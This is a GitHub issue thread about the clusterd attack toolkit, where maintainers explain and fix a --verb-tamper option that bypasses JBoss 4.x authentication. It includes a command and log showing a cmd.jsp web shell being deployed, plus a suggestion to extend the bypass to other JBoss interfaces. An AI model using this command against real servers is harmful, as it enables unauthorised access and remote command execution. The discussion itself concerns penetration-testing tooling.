Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

head tampering #33

Open
cnilsecure opened this issue Jan 25, 2015 · 4 comments
Open

head tampering #33

cnilsecure opened this issue Jan 25, 2015 · 4 comments
Labels
bug enhancement

Comments

@cnilsecure
Copy link

I saw you mention an option called --verb-tamper in order to bypass jboss 4.X auth
but in the help itself there is no mentioning how to use this option.
can you please give more details regarding on how to use it?
@breenmachine
Copy link
Collaborator

It's an auxiliary module and doesn't show up in the main list of options, however if you use the flag --aux-list you will see it.

It should be as simple as appending --verb-tamper to the options supplied.

hatRiot added a commit that referenced this issue Jan 25, 2015
@hatRiot
Modifications from #33
cac3b14 
* src/core/auxengine.py
  -- Auxiliary modules can now enable parameter passing via the
  enable_args flag.  Flag arguments will then be passed into
  the module via the fingerengine.options argument.
* src/platform/jboss/auxiliary/verb_tamper.py
  -- Few more fixes to this and an enabling of enable_args so
  that we don't confuse the deployer.  Not sure why this was
  so broken...
@hatRiot
Copy link
Owner

hatRiot commented Jan 25, 2015

Hey @cnilsecure

This issue prompted me to look into the module, and I discovered a few bugs. These have been patched up and added to the dev branch, so please check that out.

I've also added an example in the JBoss wiki for clarification. An example of the module is as follows:

$ ./clusterd.py -i localhost -a jboss -v4.0 --verb-tamper ./src/lib/resources/cmd.jsp 

        clusterd/0.4 - clustered attack toolkit
            [Supporting 7 platforms]

[2015-01-25 12:24PM] Started at 2015-01-25 12:24PM
[2015-01-25 12:24PM] Servers' OS hinted at windows
[2015-01-25 12:24PM] Fingerprinting host '192.168.1.138'
[2015-01-25 12:24PM] Server hinted at 'jboss'
[2015-01-25 12:24PM] Checking jboss version 4.0 JBoss JMX Console...
[2015-01-25 12:24PM] Checking jboss version 4.0 JBoss Web Console...
[2015-01-25 12:24PM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2015-01-25 12:24PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2015-01-25 12:24PM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2015-01-25 12:24PM] Checking jboss version Any JBoss RMI Interface...
[2015-01-25 12:24PM] Checking jboss version Any JBoss Status Page...
[2015-01-25 12:24PM] Matched 7 fingerprints for service jboss
[2015-01-25 12:24PM]    JBoss JMX Console (version 4.0)
[2015-01-25 12:24PM]    JBoss Web Console (version 4.0)
[2015-01-25 12:24PM]    JBoss EJB Invoker Servlet (version Any)
[2015-01-25 12:24PM]    JBoss HTTP Headers (Unreliable) (version 4.0)
[2015-01-25 12:24PM]    JBoss JMX Invoker Servlet (version Any)
[2015-01-25 12:24PM]    JBoss RMI Interface (version Any)
[2015-01-25 12:24PM]    JBoss Status Page (version Any)
[2015-01-25 12:24PM] Fingerprinting completed.
[2015-01-25 12:24PM] Vulnerable to verb tampering, attempting to deploy...
[2015-01-25 12:24PM] Successfully deployed /home/bryan/tools/clusterd/src/lib/resources/cmd.jsp
[2015-01-25 12:24PM] Finished at 2015-01-25 12:24PM

Let me know if you have any other questions, and thanks for the report!

@cnilsecure
Copy link
Author

Sorry to bother you again..
but looks to me that you designed the verb tampering just for jmx-console
I would suggest to apply it to any of the jboss "deployers" since they all expose to the same bug of HEAD (alot of the cases /jmx-console is missing or removed unlike invoker for example or web-console)
just my 2 cents anyhow

@hatRiot
Copy link
Owner

hatRiot commented Jan 26, 2015

Good point; I'll have to think about its implementation, but I agree it should support all interfaces.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug enhancement
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@hatRiot @breenmachine @cnilsecure